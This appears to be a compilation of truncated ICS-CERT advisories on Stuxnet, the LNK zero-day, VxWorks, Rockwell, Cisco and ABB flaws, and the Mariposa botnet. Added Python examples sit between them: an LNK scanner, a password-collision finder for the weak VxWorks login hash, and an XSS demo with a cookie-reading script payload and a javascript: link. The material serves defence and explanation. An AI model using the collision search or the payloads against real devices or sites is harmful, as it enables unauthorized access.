Source
us-cert
Overview
In July, ICS-CERT published an advisory and a series of updates regarding the Stuxnet malware entitled “ICSA-10-201 USB Malware Targeting Siemens Control Software.” Since then, ICS-CERT has continued analysis of the Stuxnet malware in an effort to determine more about its capabilities and intent. As the analysis has progressed, understanding of the malware’s sophistication has continued to increase. Stuxnet makes use of a previously unpatched Windows vulnerability and a digitally signed kernel-mode rootkit. Two digital certificates have been used to sign this rootkit: the original certificate was revoked, and a second variant was subsequently discovered in which the same rootkit was signed with a different key, which has also been revoked. With approximately 4,000 functions, Stuxnet contains as much code as some commercial software products. The complex code is object oriented and employs many programming techniques that demonstrate advanced knowledge in many areas, including...
Overview
An asset owner recently notified ICS-CERT that a vendor support contractor had added an administrative-level account during installation of new control systems software. The support contractor intended the account to be the default account used to train its people for all future work on those systems. Adding an administrative account to an ICS network, with the password known to a contract company, increases the cybersecurity risk to the asset owner. This advisory highlights existing practices that may weaken the cybersecurity of industrial control systems (ICS) environments against malicious actors.

Impact
All control systems maintained by vendors, integrators, or other contractors can potentially be impacted by the practice of adding “back door” administrative accounts for future access to perform maintenance, updates, or training. The impact to individual sites may vary, but the potential exists for an administrator-level username and password used by sup...
Overview
VirusBlokAda, an antivirus vendor based in Belarus, announced [VirusBlokAda, http://www.anti-virus.by/en/tempo.shtml, website last visited July 15, 2010] the discovery of malware that uses a zero-day vulnerability in the way Microsoft Windows processes shortcut files. The malware uses this zero-day vulnerability to exploit systems after users open a USB drive with a file manager capable of displaying icons (such as Windows Explorer). US-CERT has released a Vulnerability Note [Vulnerability Note, http://www.kb.cert.org/vuls/id/940193, website last visited July 16, 2010] detailing the vulnerability and suggested workarounds. Microsoft has also released Security Advisory 2286198 [Microsoft Security Advisory, http://www.microsoft.com/technet/security/advisory/2286198.mspx, website last visited July 19, 2010] detailing the previously unknown vulnerability. ICS-CERT has confirmed the malware installs a trojan that interacts with installed SIMATIC® WinCC or SIMATIC® Siemens STEP 7 softw...
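Both Stuxnet entries above (ICSA-10-201 and this one) describe propagation through crafted shortcut files that fire when a file manager renders their icons. As an added example, not code from ICS-CERT, Microsoft or the vendor, the following Python parses the ShellLinkHeader and LinkTargetIDList of .lnk files and flags any target item that names a .dll. The heuristic, that a legitimate shortcut's target list names an executable, document or folder rather than a DLL module, is an assumption made here; the sample shortcut, the path E:\example.dll and the placeholder item-type bytes are constructed for the demonstration.

```python
import struct
from pathlib import Path
from typing import Iterator, List, Tuple

LNK_HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046}, the shell link CLSID, in on-disk (little-endian) byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x00000001
DLL_ASCII = b".dll"
DLL_WIDE = ".dll".encode("utf-16-le")


def iter_item_ids(lnk: bytes, offset: int) -> Iterator[bytes]:
    """Yield the data of each ItemID in the LinkTargetIDList that starts at offset."""
    (id_list_size,) = struct.unpack_from("<H", lnk, offset)
    pos = offset + 2
    end = pos + id_list_size
    if end > len(lnk):
        raise ValueError("IDListSize runs past end of file")
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", lnk, pos)
        if item_size == 0:          # TerminalID: end of the list
            return
        if item_size < 2 or pos + item_size > end:
            raise ValueError("malformed ItemID")
        yield lnk[pos + 2 : pos + item_size]
        pos += item_size


def _render(item: bytes) -> str:
    """Best-effort text of an ItemID for reporting (UTF-16LE when the .dll match was wide)."""
    idx = item.lower().find(DLL_WIDE)
    if idx >= 0:
        text = item[idx % 2 :].decode("utf-16-le", errors="ignore")  # realign to the string
    else:
        text = item.decode("latin-1")
    return "".join(ch for ch in text if ch.isprintable())


def dll_references(lnk: bytes) -> List[str]:
    """Return every ItemID in the shortcut's target list that names a .dll (the heuristic
    this example looks for, an assumption: ordinary shortcuts do not target DLL modules)."""
    if len(lnk) < LNK_HEADER_SIZE:
        raise ValueError("file too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", lnk, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize or LinkCLSID)")
    if not flags & HAS_LINK_TARGET_ID_LIST:
        return []
    hits = []
    for item in iter_item_ids(lnk, LNK_HEADER_SIZE):
        low = item.lower()              # case-insensitive match in either encoding
        if DLL_ASCII in low or DLL_WIDE in low:
            hits.append(_render(item))
    return hits


def scan_shortcuts(root: Path) -> List[Tuple[Path, List[str]]]:
    """Walk a mounted drive (or a folder of copied files) and report suspicious .lnk files."""
    findings = []
    for path in root.rglob("*.lnk"):
        try:
            refs = dll_references(path.read_bytes())
        except ValueError:
            continue                    # not parseable as a shortcut; skip it
        if refs:
            findings.append((path, refs))
    return findings


def build_sample_lnk(target: str) -> bytes:
    """Constructed sample: a minimal shortcut whose ID list ends in a UTF-16LE path.
    The leading type bytes (0x1F, 0x2F) are placeholders, not real shell item encodings."""
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, HAS_LINK_TARGET_ID_LIST)
    header = header.ljust(LNK_HEADER_SIZE, b"\x00")
    items = [b"\x1f" + bytes(16), b"\x2f" + target.encode("utf-16-le") + b"\x00\x00"]
    id_list = b"".join(struct.pack("<H", len(it) + 2) + it for it in items) + b"\x00\x00"
    return header + struct.pack("<H", len(id_list)) + id_list


if __name__ == "__main__":
    for target in (r"C:\Windows\notepad.exe", r"E:\example.dll"):
        print(target, "->", dll_references(build_sample_lnk(target)))
```

Run scan_shortcuts against the mount point of a removable drive from a host whose file manager does not render shortcut icons (or against a folder of copied .lnk files), and treat a hit as a reason to image the drive rather than browse it.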
Overview
A security researcher has identified two vulnerabilities affecting the Wind River Systems VxWorks platform: a debug service enabled by default (VU#362332) and a weak hashing algorithm used in authentication (VU#840249). ICS-CERT has been coordinating with CERT/CC in alerting control systems vendors of these vulnerabilities and will continue to coordinate and publish updates as needed.

Affected Products
VxWorks is a real-time operating system used in embedded systems, including control system components. Because the vulnerable code is embedded in other vendors’ products, the actual list of affected products is large and not completely known. Not all products using VxWorks are vulnerable. ICS-CERT recommends that end users contact their vendors to determine if their products are affected by these vulnerabilities. CERT/CC has a partial list of vendors in the Vulnerability Notes referenced above.

Impact
Access to the debug service could result in i...
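The weak authentication hash (VU#840249) matters because a collision, not the original password, is enough to log in. As an added example that is neither Wind River's code nor ICS-CERT's, the Python below reconstructs, from public analyses of the legacy VxWorks login hash, a weighted byte sum that is scaled by an odd constant modulo 2^32 and rendered as letters; the constant and the letter remapping are assumptions, but the point demonstrated holds for any hash of this shape: because the sum is additive per position, a different password with the same sum (and therefore the same hash) can be found by a short pruned search rather than brute force. The candidate alphabet and the sample password are constructed here.

```python
from typing import List, Optional

# Candidate character set for the collision search: printable ASCII (an assumption).
ALPHABET: List[int] = list(range(0x21, 0x7F))


def term(c: int, i: int) -> int:
    """Contribution of byte c at zero-based position i to the password sum."""
    return (c * (i + 1)) ^ (i + 1)


def password_sum(password: bytes) -> int:
    return sum(term(c, i) for i, c in enumerate(password))


def legacy_hash(password: bytes) -> str:
    """Reconstruction (from public analyses; constants are an assumption) of the legacy hash.
    Multiplying by an odd constant mod 2^32 is a bijection and the digit-to-letter remap is
    injective, so two passwords collide under this hash exactly when their sums collide."""
    value = (password_sum(password) * 31695317) & 0xFFFFFFFF
    out = bytearray()
    for ch in str(value).encode("ascii"):
        if ch < 0x33:
            ch += 0x21
        if ch < 0x37:
            ch += 0x2F
        if ch < 0x39:
            ch += 0x42
        out.append(ch)
    return out.decode("ascii")


def find_collision(target: bytes, alphabet: List[int] = ALPHABET) -> Optional[bytes]:
    """Depth-first search for a different password of the same length and the same sum.
    Positions are filled left to right; a branch is cut as soon as the positions still
    to fill cannot reach the remaining sum, so the search is near-linear in practice."""
    n = len(target)
    goal = password_sum(target)
    lo = [min(term(c, i) for c in alphabet) for i in range(n)]
    hi = [max(term(c, i) for c in alphabet) for i in range(n)]
    lo_rest = [0] * (n + 1)     # smallest sum the positions i.. can still contribute
    hi_rest = [0] * (n + 1)     # largest sum the positions i.. can still contribute
    for i in range(n - 1, -1, -1):
        lo_rest[i] = lo[i] + lo_rest[i + 1]
        hi_rest[i] = hi[i] + hi_rest[i + 1]
    chosen = bytearray(n)

    def dfs(i: int, remaining: int) -> bool:
        if i == n:
            return remaining == 0 and bytes(chosen) != target
        for c in alphabet:
            rest = remaining - term(c, i)
            if lo_rest[i + 1] <= rest <= hi_rest[i + 1]:
                chosen[i] = c
                if dfs(i + 1, rest):
                    return True
        return False

    return bytes(chosen) if dfs(0, goal) else None


if __name__ == "__main__":
    original = b"password"              # constructed sample
    twin = find_collision(original)
    print(original, legacy_hash(original))
    print(twin, legacy_hash(twin))
```

The hash collapses the password space to roughly the range of the sum, tens of thousands of values even for forty-character passwords, so any stored hash can be matched this way; the fix has to come from the vendor (a stronger hashing routine), together with keeping the device's login services off networks an attacker can reach.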
Overview
Cisco has identified multiple security vulnerabilities [Cisco, http://www.cisco.com/en/US/products/products_security_advisory09186a0080b2c518.shtml, website last visited May 27, 2010] in the Cisco Network Building Mediator (NBM) products. These vulnerabilities also affect the legacy Richards-Zeta Mediator products. The following vulnerabilities have been identified: default credentials, privilege escalation, unauthorized information interception, and unauthorized information access. Successful exploitation of any of these vulnerabilities could allow a malicious user to take complete control of an affected device.

Affected Products
These vulnerabilities affect the legacy Richards-Zeta Mediator 2500 product and the Cisco Network Building Mediator NBM-2400 and NBM-4800 models. All Mediator Framework software releases prior to 3.1.1 are affected by all vulnerabilities listed in this advisory.

Impact
Impact to individual organizations depends on many factors that are unique to each ...
OVERVIEW
A buffer overflow vulnerability exists in the Rockwell Automation RSLinx Classic EDS Hardware Installation Tool (RSHWare.exe). This vulnerability is likely exploitable; however, significant user interaction would be required.

AFFECTED PRODUCTS
EDS Hardware Installation Tool Version 1.0.5.1 and earlier.

IMPACT
The CVSS impact subscore for this vulnerability, as calculated by ICS-CERT, is high (10) because successfully exploiting this vulnerability would allow an attacker to run arbitrary code on the target machine. However, the exploitability subscore is low (3.2) because of the difficulty of exploiting this vulnerability. Impact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their environment, architecture, and product implementation.

BACKGROUND
Rockwell Automation provides industrial automation control and information products worldwide across a...
Overview
A cross-site scripting (XSS) vulnerability [http://www.owasp.org/index.php/Cross-siteScripting(XSS)] exists in the system used by the ABB Electrical Distribution Management System (DMS) product netCADOPS to generate online Help.

Affected Products
All releases of the ABB netCADOPS product. The ABB Network Manager DMS client products ORMap and OMI are not affected, because this vulnerability is related solely to the netCADOPS web-based online Help. Further, no other ABB SCADA products, including, but not limited to, MicroSCADA Pro, RANGER, Network Manager NM-R, and 800xA, are affected by this vulnerability.

Impact
At this time, ICS-CERT has not independently verified the vulnerability or the update to determine the condition details and potential impact to organizations. ICS-CERT is providing this notice to make organizations aware of the vulnerability and the patch release from ABB. ICS-CERT recommends that organizations contact ABB for additional details to evaluate the impact of th...
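Generated online Help is a classic place for XSS: text pulled from a data source is pasted into an HTML page without encoding for the context it lands in. The advisory gives no detail of the netCADOPS defect, so the Python below is an added illustration of the general pattern and not ABB's code: it renders a help page the vulnerable way and the hardened way, and adds the separate check needed for link targets, where HTML encoding alone does not neutralise a javascript: URL. The topic title, body, template and link are constructed for the example.

```python
import html
from string import Template
from urllib.parse import urlsplit

# Constructed sample: a help topic whose title carries attacker-controlled markup.
MALICIOUS_TITLE = "Feeder status <script>alert(document.cookie)</script>"
SAMPLE_BODY = 'Shows the <b>state</b> of each feeder; use "Refresh" to update.'

# Hypothetical page template for the generated Help (not the vendor's).
PAGE = Template(
    '<html><body><h1>$title</h1><p>$body</p>'
    '<a href="$next_href">Next topic</a></body></html>'
)


def render_unsafe(title: str, body: str, next_href: str) -> str:
    """The vulnerable pattern: raw strings substituted straight into the HTML."""
    return PAGE.substitute(title=title, body=body, next_href=next_href)


def safe_href(url: str) -> str:
    """Allow only relative links or http(s) URLs, then encode for the attribute context.
    Encoding alone would leave javascript:alert(1) intact, so the scheme is checked first."""
    url = url.strip()
    scheme = urlsplit(url).scheme.lower()
    if scheme and scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_safe(title: str, body: str, next_href: str) -> str:
    """Hardened: every value is encoded for the context it lands in (text node or attribute)."""
    return PAGE.substitute(
        title=html.escape(title, quote=True),
        body=html.escape(body, quote=True),
        next_href=safe_href(next_href),
    )


def contains_active_content(markup: str) -> bool:
    """Crude comparison check: an unencoded <script> tag or a javascript: link in the output."""
    low = markup.lower()
    return "<script" in low or 'href="javascript:' in low


if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        page = render(MALICIOUS_TITLE, SAMPLE_BODY, "javascript:alert(1)")
        print(render.__name__, "active content:", contains_active_content(page))
```

Note that the hardened renderer also encodes the `<b>` that the sample body legitimately contains; a Help generator that needs formatting should render from a restricted markup of its own rather than relax the encoding, and the link check is a whitelist of schemes, not a blacklist of "javascript".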
Overview
ICS-CERT has received reports of, and investigated, infections by the Mariposa botnet [Defence Intelligence, http://defintel.com/docs/MariposaAnalysis.pdf, website last accessed March 15, 2010], which have affected the business networks of multiple control system owners in recent months. ICS-CERT has no information to indicate that these infections have specifically targeted United States Critical Infrastructure and Key Resources (CIKR), or any specific sector or organization.

Background
In May 2009, Defence Intelligence announced the discovery of a botnet called “Mariposa.” The investigation that followed aimed at bringing down the criminal network behind what has become one of the largest botnets on record. After months of investigation by the Guardia Civil in Spain, the FBI, security firm Panda Security, and Defence Intelligence, authorities took down a 12.7-million-strong zombie network in December. In February 2010, Spanish authorities arrested three suspects in Sp...
Overview
Rockwell Automation has identified a security vulnerability in the authentication mechanism of the programming and configuration client software employed by certain versions of the PLC-5 and SLC 5/0x family of programmable controllers.

Affected Products
Rockwell PLC-5 and SLC 5/0x controllers are affected, including the following catalog numbers: 1785-Lx and 1747-L5x. The programming and configuration client software for these devices, RSLogix, is also affected by this vulnerability. For a complete listing of affected products and firmware versions, please see Rockwell’s Technotes [Rockwell Technote, http://rockwellautomation.custhelp.com/app/answers/detail/a_id/66684/kw/vulnerability/r_id/115100, website last accessed March 4, 2010; Rockwell Technote, http://rockwellautomation.custhelp.com/app/answers/detail/a_id/66678/kw/vulnerability/r_id/115100, website last accessed March 4, 2010].

Impact
A significant number of PLC-5s and SLC 500s are installed worldwide. Successful exploitation ...